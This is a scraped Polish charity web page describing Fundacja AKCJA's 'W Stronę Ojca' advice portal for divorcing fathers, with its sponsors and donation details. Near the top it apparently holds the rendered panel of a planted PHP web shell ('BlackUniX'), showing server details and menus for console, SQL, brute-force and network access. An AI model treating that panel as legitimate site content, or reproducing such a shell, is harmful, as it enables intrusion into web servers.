W Stronę Ojca i no co ty Tato

Polecamy

Zamów nasz biuletyn
r e k l a m a

 
BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut/rosol #10 SMP Fri May 4 22:26:53 CEST 2018 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 07:24:28
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.85.115
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

O projekcie
Robert Kucharski twórca serwisu, kieruje Fundacją AKCJA
Bezpośrednia inspiracją dla stworzenia w 2000 roku serwisu "W stronę ojca", były moje doświadczenia w pracy w warszawskim Biurze Porad Obywatelskich. Dużą grupę moich klientów stanowili mężczyźni, którzy w wyniku konfliktu rodzinnego tracili kontakt z dzieckiem lub popadali w długi na skutek zawyżonych alimentów. Wszyscy byli sfrustrowani i rozżalenia z powodu przedmiotowego traktowania ich w sądach rodzinnych. Razem z przyjaciółmi postanowiliśmy przygotować dla wszystkich, którzy znajdą się w podobnej sytuacji, bezpłatną i łatwo dostępną informację o przysługujących im prawach. Z czasem ten pomysł przerodził się w projekt internetowego portalu.
Portal www.wstroneojca.pl adresowany jest do mężczyzn przeżywających kryzys małżeński i problemy rodzinne związane z rozwodem, separacją oraz izolacją od własnych dzieci. Uważamy, że osoby rozwodzące się oraz ich dzieci nie muszą doświadczać wyniszczającego wszystkie strony konfliktu.
W naszym portalu można znaleźć praktyczne porady, oparte na podstawach prawnych, dotyczące problematyki ojcostwa, rozwodu, separacji, władzy rodzicielskiej, alimentów i uprawnień ojców wynikających z kodeksu pracy.
Zainteresowanym, którzy stanęli wobec problemu, jakim jest kryzys małżeński, oferujemy w działach psychologia i prawo przydatne poradniki. Ponadto prezentujemy zbiór publikacji związanych z zagadnieniami społecznej i prawnej roli ojca oraz utrwalonym stereotypem identyfikującym dobro dziecka z interesem matki.
  Do dyspozycji zainteresowanych oddajemy nasze Forum Dyskusyjne, nasz Czat oraz nasze Sondy. Na Forum można wyrażać swoje poglądy oraz dzielić się doświadczeniami na tematy związane z szeroko pojętym ojcostwem. Nasze Forum posiada regulamin, który obowiązuje wszystkich uczestników dyskusji. Autorzy projektu nie ponoszą jednak odpowiedzialności za publikowane na stronach Forum wypowiedzi.
Dzięki Unii Europejskiej i Urzędowi Miasta Warszawa prowadzimy bezpłatne poradnictwo prawne i psychologiczne on -line oraz poradnictwo stacjonarne w biurach Fundacji AKCJA w Warszawie, Krakowie i Poznaniu.Od tego roku uruchamiamy punkt konsultacyjny w Katowicach. We wszystkich naszych punktach konsultacyjnych działają grupy wsparcia prowadzone przez doświadczonych terapeutów, a porad prawnych udzielają doświadczeni adwokaci.
Dzięki intensywnemu lobbyngowi udało nam się wpłynąć na ostateczny kształt znowelizowanego kodeksu rodzinnego i opiekuńczego i przeforsować zapisy umożliwiające funkcjonowanie w formalno prawny sposób opieki wspólnej, nazywanej też naprzemienną, oraz ułatwiające egzekucję kontaktów z dzieckiem orzeczonych sądownie. Obecnie uczestniczymy, jako wnioskodawcy w pracach Komisji Nadzwyczajnej Przyjazne Państwo przygotowując nowelizację kpc, która ma na celu dalsze usprawnienie procesu egzekucji wyroków sądowych w sprawach o kontakty z dzieckiem.

Mamy nadzieję, że nasz serwis przyczyni się do zmiany społecznego stereotypu, ograniczającego rolę mężczyzny po rozwodzie jedynie do obowiązku alimentacyjnego.  Wierzymy też, że dzięki naszej pomocy mężczyźni, przeżywający problemy rodzinne będą się czuli mniej osamotnieni i uwierzą, że misja jaką jest ojcostwo warta jest wszelkich poświęceń .

Robert Kucharski

Nasi Sponsorzy:
FUNDACJA BATOREGO

Projekt powstał w 2000 r. dzięki dotacji Fundacji Stefana Batorego. Dzięki Unii Europejskiej , Funduszowi FOP i Urzędowi Miasta Warszawa prowadzimy bezpłatne poradnictwo prawne i psychologiczne on -line oraz poradnictwo stacjonarne w biurze Fundacji AKCJA w Warszawie.

Program W Stronę Ojca jest prowadzony przez Fundację AKCJA
Jeśli chcesz wyrazić wyrazić swoje uznanie dla działań Fundacji, a nie wiesz jak, pamiętaj, że możesz dokonać wpłaty na nasze konto:
Volkswagen Bank Polska
Fundacja Akcja
ul.Próchnika 8/166,
01-585 Warszawa
64 2130 0004 2001 0205 1225 0003

 

Twoja dotacja(nawet niewielka) pomoże nam prowadzić serwis www.wstroneojca.pl

 

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.